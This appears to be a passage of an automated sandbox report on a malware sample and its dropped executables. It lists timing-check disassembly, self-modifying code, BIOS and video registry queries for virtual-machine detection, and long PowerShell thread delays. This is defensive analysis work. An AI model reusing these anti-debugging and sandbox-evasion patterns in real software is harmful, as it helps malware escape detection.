                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70376 second address: 4B7037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7037C second address: 4B703BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 call 00007FD81D0C842Fh 0x0000000e push eax 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 mov ax, di 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD81D0C842Dh 0x0000001d jmp 00007FD81D0C842Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B703BB second address: 4B703BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B703BF second address: 4B703D8 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 1CABh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C842Dh 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7049F second address: 4B704A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704A5 second address: 4B704A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704A9 second address: 4B704F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007FD81C888266h 0x00000011 pop ebx 0x00000012 jmp 00007FD81C888260h 0x00000017 mov esp, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007FD81C88825Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B704F4 second address: 4B7050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 call 00007FD81D0C842Eh 0x0000000c pop ecx 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60244 second address: 4B6024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B6024A second address: 4B6024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B6024E second address: 4B60277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81C88825Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dl, cl 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 mov eax, edx 0x00000017 popad 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ah, dl 0x00000020 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50E98 second address: 4B50E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50E9E second address: 4B50EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD81C888269h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FD81C88825Eh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD81C88825Dh 0x00000020 mov bl, cl 0x00000022 popad 0x00000023 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B50EE6 second address: 4B50EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0D23 second address: 4BD0DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888264h 0x00000009 xor eax, 2200C578h 0x0000000f jmp 00007FD81C88825Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD81C888268h 0x0000001b add ecx, 398C5FD8h 0x00000021 jmp 00007FD81C88825Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b jmp 00007FD81C888266h 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007FD81C888267h 0x0000003a or ax, F7FEh 0x0000003f jmp 00007FD81C888269h 0x00000044 popfd 0x00000045 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0DCD second address: 4BD0E25 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD81D0C8430h 0x00000008 add si, 4EF8h 0x0000000d jmp 00007FD81D0C842Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD81D0C8438h 0x0000001b and cx, A958h 0x00000020 jmp 00007FD81D0C842Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, bx 0x0000002e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0E25 second address: 4BD0E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FD81C88825Dh 0x0000000b jmp 00007FD81C888260h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD81C88825Ch 0x0000001b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0E89 second address: 4BC0E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0E8D second address: 4BC0EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EA1 second address: 4BC0EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FD81D0C842Dh 0x0000000c add esi, 45E1C366h 0x00000012 jmp 00007FD81D0C8431h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, 0Dh 0x00000021 mov dx, cx 0x00000024 popad 0x00000025 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EDA second address: 4BC0EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dh, CEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD81C888260h 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0EF8 second address: 4BC0F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81D0C8436h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, 54A87FE0h 0x00000019 popad 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F29 second address: 4BC0F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F2F second address: 4BC0F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0F53 second address: 4BC0F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03CB second address: 4BD03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03D1 second address: 4BD03FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e movsx edi, cx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD81C888260h 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD03FD second address: 4BD042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81D0C8436h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 mov esi, edx 0x00000018 popad 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD042D second address: 4BD0442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C888261h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0442 second address: 4BD047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FD81D0C842Dh 0x00000010 push dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov esi, 57EBE9F3h 0x00000019 movzx eax, di 0x0000001c popad 0x0000001d push FC8F4248h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD81D0C842Ah 0x0000002b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD047A second address: 4BD0489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0489 second address: 4BD0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0490 second address: 4BD04A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 0371BDBAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD04A4 second address: 4BD04BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD04E4 second address: 4BD0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD0508 second address: 4BD050C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BD050C second address: 4BD0512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 845DD7 second address: 845DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 845DDD second address: 845DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 323296 second address: 322B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D229Fh], eax 0x00000012 push dword ptr [ebp+122D140Dh] 0x00000018 jl 00007FD81D0C8440h 0x0000001e call dword ptr [ebp+122D188Eh] 0x00000024 pushad 0x00000025 cld 0x00000026 xor eax, eax 0x00000028 pushad 0x00000029 jne 00007FD81D0C842Ch 0x0000002f xor dword ptr [ebp+122D232Bh], ebx 0x00000035 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jl 00007FD81D0C842Ch 0x00000046 mov dword ptr [ebp+122D2973h], eax 0x0000004c sub dword ptr [ebp+122D26DCh], esi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D26DCh], ebx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D270Bh], edx 0x00000067 lodsw 0x00000069 stc 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e jmp 00007FD81D0C842Eh 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 stc 0x00000078 jng 00007FD81D0C8427h 0x0000007e stc 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 322B2E second address: 322B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 322B32 second address: 322B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 322B38 second address: 322B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 4A1FC3 second address: 4A1FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Eh 0x00000008 jmp 00007FD81D0C842Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 4902E1 second address: 4902F0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 4902F0 second address: 4902F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 4902F7 second address: 4902FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 4A122A second address: 4A1234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Tries to evade debugger and weak emulator (self modifying code)
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESpecial instruction interceptor: First address: 692B98 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESpecial instruction interceptor: First address: 83773F instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESpecial instruction interceptor: First address: 84D58A instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 322B98 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 4C773F instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 4DD58A instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSpecial instruction interceptor: First address: 11CF905 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSpecial instruction interceptor: First address: 11CF9CC instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSpecial instruction interceptor: First address: 13EFFE7 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSpecial instruction interceptor: First address: 13D9EB8 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSpecial instruction interceptor: First address: 144BEFD instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSpecial instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSpecial instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSpecial instruction interceptor: First address: 121F905 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSpecial instruction interceptor: First address: 121F9CC instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSpecial instruction interceptor: First address: 143FFE7 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSpecial instruction interceptor: First address: 1429EB8 instructions caused by: Self-modifying code
                                                Source: C:\ProgramData\jnxnee\benskvi.exeSpecial instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
                                                Source: C:\ProgramData\jnxnee\benskvi.exeSpecial instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSpecial instruction interceptor: First address: 149BEFD instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXESpecial instruction interceptor: First address: 1D2B98 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXESpecial instruction interceptor: First address: 37773F instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXESpecial instruction interceptor: First address: 38D58A instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeSpecial instruction interceptor: First address: 8DB12E instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeSpecial instruction interceptor: First address: B15B78 instructions caused by: Self-modifying code
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXECode function: 11_2_04BD03B4 rdtsc 11_2_04BD03B4
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 180000
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 180000
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5117Jump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3953Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5548Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4237Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1047
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 959
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 885
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1834
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1078
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1070
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeWindow / User API: threadDelayed 376
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6365
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 421
